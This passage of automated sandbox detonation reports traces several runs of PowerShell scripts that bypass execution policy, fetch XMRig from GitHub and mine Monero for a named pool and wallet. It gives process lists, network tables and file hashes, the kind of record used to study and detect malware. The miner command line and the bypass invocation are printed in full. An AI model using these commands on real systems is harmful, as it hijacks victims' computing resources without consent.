| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4208 wrote to memory of 2720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4208 wrote to memory of 2720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqaouu4b.owp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10v2004-20240611-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5088 wrote to memory of 4480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5088 wrote to memory of 4480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4440,i,6870419347051655189,5491911050420577193,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3784,i,6870419347051655189,5491911050420577193,262144 --variations-seed-version --mojo-platform-channel-handle=1044 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fgvgiv4.dve.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral19
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10v2004-20240508-en
Max time kernel
1722s
Max time network
1731s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/964-0-0x00007FFB795C3000-0x00007FFB795C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvwgcn0q.qns.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral30
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:10
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4540 wrote to memory of 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4540 wrote to memory of 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhq1riv5.ml4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4540-25-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/4540-48-0x000001AA79EC0000-0x000001AA79ED2000-memory.dmp
memory/4540-61-0x000001AA797E0000-0x000001AA797EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win7-20240221-en
Max time kernel
1558s
Max time network
1559s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4740 wrote to memory of 1996 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4740 wrote to memory of 1996 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4fyvzlca.sli.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4740-25-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp
memory/4740-48-0x000002B4B48A0000-0x000002B4B48B2000-memory.dmp
memory/4740-61-0x000002B4B4860000-0x000002B4B486A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral21
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2696 wrote to memory of 3624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2696 wrote to memory of 3624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4244,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1404,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2696-0-0x00007FFCA8693000-0x00007FFCA8695000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ayljf3ja.bhz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
